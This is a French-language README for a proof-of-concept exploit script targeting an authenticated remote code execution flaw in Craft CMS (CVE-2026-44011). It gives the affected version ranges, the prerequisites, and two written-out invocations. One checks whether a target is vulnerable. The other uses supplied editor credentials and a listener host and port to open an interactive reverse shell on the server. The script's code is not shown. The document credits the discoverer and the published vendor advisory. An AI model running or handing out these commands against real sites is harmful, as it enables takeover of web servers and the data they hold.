
PoC RCE authentifié pour Craft CMS (CVE-2026-44011)
Ce script Python adapte l'attaque décrite dans l'avis de sécurité Craft CMS. Un utilisateur Craft authentifié peut atteindre un chemin de configuration de mise en page de champs vulnérable et provoquer l'exécution de commandes par le serveur.
Les versions affectées sont Craft CMS >=4.0.0, <4.17.12 et >=5.0.0, <5.9.18.
Le script nécessite curl sur les deux hôtes. Il utilise Bash sur le serveur. Python3 sur le serveur fournit également un PTY interactif ; sans lui, le shell se rabat sur une connexion basique.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
Craft CMS crédite @precicom-vincent-tl comme découvreur de CVE-2026-44011. Les détails de la vulnérabilité et l'exemple de payload sont publiés dans l'avis Craft CMS GHSA-qrgm-p9w5-rrfw. Ce script adapte cette technique publiée.